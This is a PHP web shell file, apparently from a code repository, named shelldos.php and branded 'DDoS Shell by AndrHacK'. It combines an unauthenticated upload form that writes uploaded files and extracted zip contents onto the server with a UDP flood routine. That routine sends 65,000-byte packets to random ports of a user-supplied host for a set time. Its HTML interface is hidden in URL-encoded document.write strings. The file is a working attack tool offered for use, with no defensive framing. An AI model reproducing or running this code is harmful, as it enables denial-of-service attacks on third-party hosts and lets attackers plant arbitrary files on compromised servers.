-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathshelldos.php
68 lines (63 loc) · 8.01 KB
/
shelldos.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
if($_POST['_upl'] == "Upload" )
{
if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{
echo '<b>Yükleme Başarılı !</b><br><br>';
$zip = zip_open("".$_FILES['file']['name']."");
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$fp = fopen(zip_entry_name($zip_entry), "w");
if (zip_entry_open($zip, $zip_entry, "r")) {
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
fwrite($fp,"$buf");
zip_entry_close($zip_entry);
fclose($fp);
}
}
zip_close($zip);
}
}
else
{
echo '<b>Yükleme Başarısız !</b><br><br>';
}
}
?>
< form action="<?php $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
< input type="file" name="file" size="50"><br />
< input name="_upl" type="submit" id="_upl" value="Upload">
< /form>
<script type="text/javascript">
<!-- ddos shell code: andrhack -->
document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%74%69%74%6C%65%3E%2D%2D%44%6F%53%5F%53%48%45%4C%4C%2D%2D%3C%2F%74%69%74%6C%65%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%73%74%79%6C%65%3E%0A%75%6C%20%7B%0A%20%20%20%20%6C%69%73%74%2D%73%74%79%6C%65%2D%74%79%70%65%3A%20%6E%6F%6E%65%3B%0A%20%20%20%20%6D%61%72%67%69%6E%3A%20%30%3B%0A%20%20%20%20%70%61%64%64%69%6E%67%3A%20%30%3B%0A%20%20%20%20%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%0A%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%20%23%33%33%33%3B%0A%7D%0A%0A%6C%69%20%7B%0A%20%20%20%20%66%6C%6F%61%74%3A%20%6C%65%66%74%3B%0A%7D%0A%0A%6C%69%20%61%20%7B%0A%20%20%20%20%64%69%73%70%6C%61%79%3A%20%62%6C%6F%63%6B%3B%0A%20%20%20%20%63%6F%6C%6F%72%3A%20%77%68%69%74%65%3B%0A%20%20%20%20%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%70%61%64%64%69%6E%67%3A%20%31%34%70%78%20%31%36%70%78%3B%0A%20%20%20%20%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%3B%0A%7D%0A%0A%6C%69%20%61%3A%68%6F%76%65%72%3A%6E%6F%74%28%2E%61%63%74%69%76%65%29%20%7B%0A%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%20%23%31%31%31%3B%0A%7D%0A%0A%2E%61%63%74%69%76%65%20%7B%0A%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%20%23%34%43%41%46%35%30%3B%0A%7D%0A%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%75%6C%3E%0A%20%20%3C%74%72%3E%3C%6C%69%3E%3C%61%20%63%6C%61%73%73%3D%22%61%63%74%69%76%65%22%20%68%72%65%66%3D%22%23%22%3E%44%44%6F%53%20%5A%4F%4E%45%3C%2F%61%3E%3C%2F%6C%69%3E%3C%2F%74%72%3E%0A%20%20%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%2F%61%2E%7A%69%70%22%3E%53%48%45%4C%4C%3C%2F%61%3E%3C%2F%6C%69%3E%0A%20%20%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%5A%4F%4E%45%20%4C%30%4E%4B%22%3E%53%48%45%4C%4C%2D%3C%2F%61%3E%3C%2F%6C%69%3E%0A%20%20%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%22%3E%53%53%3C%2F%61%3E%3C%2F%6C%69%3E%0A%3C%2F%75%6C%3E%0A%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A%0A%0A%3C%68%74%6D%6C%3E%0A%20%20%20%20%3C%62%6F%64%79%20%62%61%63%6B%67%72%6F%75%6E%64%3D%22%68%74%74%70%73%3A%2F%2F%63%77%2D%63%65%6C%6C%61%74%2E%30%30%30%77%65%62%68%6F%73%74%61%70%70%2E%63%6F%6D%2F%63%65%6C%6C%61%74%31%77%6C%70%70%2E%6A%70%65%67%22%3E%0A%20%20%20%20%3C%2F%62%6F%64%79%3E%0A%20%3C%2F%68%74%6D%6C%3E%0A%0A%0A%2D%2D%0A%0A%0A%3C%62%6F%64%79%20%62%67%63%6F%6C%6F%72%3D%22%62%6C%61%63%6B%22%3E%0A%0A%0A%0A%0A%3C%2F%65%6D%62%65%64%3E%3C%2F%6F%62%6A%65%63%74%3E%20%3C%62%72%20%2F%3E%0A%3C%69%6D%67%20%73%72%63%3D%22%23%22%20%77%69%64%74%68%3D%22%38%30%22%20%68%65%69%67%68%74%3D%22%31%33%22%20%61%6C%74%3D%22%22%20%2F%3E%3C%2F%70%3E%0A%3C%21%2D%2D%71%70%69%2D%2D%3E%3C%21%2D%2D%2F%71%70%69%2D%2D%3E%20%3C%21%2D%2D%71%70%69%2D%2D%3E%3C%62%72%20%2F%3E%0A%3C%62%72%20%2F%3E%0A%3C%62%72%20%2F%3E%0A%3C%62%72%20%2F%3E%0A%3C%62%72%20%2F%3E%0A%3C%62%72%20%2F%3E%0A%3C%64%69%76%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%20%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%73%69%7A%65%3A%20%78%78%2D%6C%61%72%67%65%3B%20%22%3E%3C%61%20%68%72%65%66%3D%22%22%3E%3C%73%70%61%6E%20%0A%0A%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%72%67%62%28%30%2C%20%32%35%35%2C%20%30%29%3B%20%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%27%43%6F%75%72%69%65%72%20%4E%65%77%27%3B%20%22%3E%42%61%5F%61%72%31%6C%31%20%2F%20%5E%69%6D%64%69%20%42%6F%74%20%55%20%4B%61%79%64%65%64%69%6E%3C%2F%73%70%61%6E%3E%3C%2F%73%70%61%6E%3E%3C%2F%61%3E%3C%2F%73%70%61%6E%3E%3C%2F%64%69%76%3E%0A%0A%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%09%3C%74%69%74%6C%65%3E%44%44%6F%53%20%53%68%65%6C%6C%20%62%79%20%41%6E%64%72%48%61%63%4B%3C%2F%74%69%74%6C%65%3E%0A%09%3C%6D%65%74%61%20%63%68%61%72%73%65%74%3D%22%75%74%66%2D%38%22%3E%0A%09%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%09%09%62%6F%64%79%20%7B%0A%09%09%09%62%61%63%6B%67%72%6F%75%6E%64%3A%23%64%64%64%3B%0A%09%09%09%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%22%54%72%65%62%75%63%68%65%74%20%4D%53%22%3B%0A%09%09%09%63%6F%6C%6F%72%3A%20%23%30%30%30%3B%0A%09%09%7D%0A%09%09%69%6E%70%75%74%5B%74%79%70%65%3D%22%74%65%78%74%22%5D%20%7B%0A%09%09%09%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%20%23%63%63%63%3B%0A%09%09%09%62%6F%72%64%65%72%3A%31%70%78%20%73%6F%6C%69%64%20%23%63%63%63%3B%0A%09%09%09%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%30%3B%0A%09%09%09%77%69%64%74%68%3A%20%32%35%30%70%78%3B%0A%09%09%09%68%65%69%67%68%74%3A%20%33%30%70%78%3B%0A%09%09%7D%0A%09%09%69%6E%70%75%74%5B%74%79%70%65%3D%22%73%75%62%6D%69%74%22%5D%20%7B%0A%09%09%09%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%20%23%63%63%63%3B%0A%09%09%09%62%6F%72%64%65%72%3A%31%70%78%20%73%6F%6C%69%64%20%23%63%63%63%3B%0A%09%09%09%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%30%3B%0A%09%09%09%77%69%64%74%68%3A%20%32%35%30%70%78%3B%0A%09%09%09%68%65%69%67%68%74%3A%20%33%30%70%78%3B%0A%09%09%7D%0A%09%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%09%3C%63%65%6E%74%65%72%3E%0A%09%09%3C%66%6F%72%6D%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%20%61%63%74%69%6F%6E%3D%22%22%3E%0A%09%09%09%3C%68%31%3E%3C%69%6D%67%20%68%65%69%67%68%74%3D%22%31%30%30%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%2E%68%69%7A%6C%69%72%65%73%69%6D%2E%63%6F%6D%2F%38%4D%44%31%59%64%2E%70%6E%67%22%20%77%69%64%68%74%3D%22%31%30%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%52%65%64%22%20%66%61%63%65%3D%22%63%6F%75%72%69%65%72%22%20%73%69%7A%65%3D%22%36%22%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%73%68%61%64%6F%77%3A%20%30%70%78%20%30%70%78%20%31%30%70%78%3B%22%3E%3C%2F%68%31%3E%0A%09%09%09%3C%68%32%3E%44%44%6F%53%20%53%48%45%4C%4C%20%2D%20%41%6E%64%72%48%61%63%4B%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%52%65%64%22%20%66%61%63%65%3D%22%63%6F%75%72%69%65%72%22%20%73%69%7A%65%3D%22%36%22%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%73%68%61%64%6F%77%3A%20%30%70%78%20%30%70%78%20%35%70%78%3B%22%3E%3C%2F%68%32%3E%0A%09%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%6E%61%6D%65%3D%22%68%6F%73%74%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%48%6F%73%74%20%64%6F%20%53%69%74%65%22%3E%0A%09%09%09%0A%09%09%09%3C%62%72%20%2F%3E%0A%09%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%6E%61%6D%65%3D%22%74%69%6D%65%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%54%65%6D%70%6F%20%64%6F%20%44%44%4F%53%22%3E%0A%09%09%09%3C%62%72%20%2F%3E%0A%09%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%76%61%6C%75%65%3D%22%41%54%54%41%43%4B%21%22%3E%0A%09%09%09%3C%62%72%20%2F%3E%0A'));
</script>
<?php
if(isset($_POST['host']) and isset($_POST['time'])) {
$pacotes = 0;
set_time_limit(0);
$tempo=time();
$tempo_maximo=$tempo+$_POST['time'];
$host=htmlspecialchars($_POST['host']);
for ($i=0; $i < 65000; $i++) {
$out .= 'X';
}
while(1) {
$pacotes++;
if(time() > $tempo_maximo) {
break;
}
$gerar = rand(1,65000);
$abrir=fsockopen("udp://".$host,$gerar,$errno,$errstr,5);
if($abrir) {
fwrite($abrir, $out);
fclose($abrir);
}
}
echo "Ataque finalizado!";
}
?>
<script type="text/javascript">
<!-- Son -->
document.write(unescape('%3C%2F%66%6F%72%6D%3E%0A%09%3C%2F%63%65%6E%74%65%72%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E'));
</script>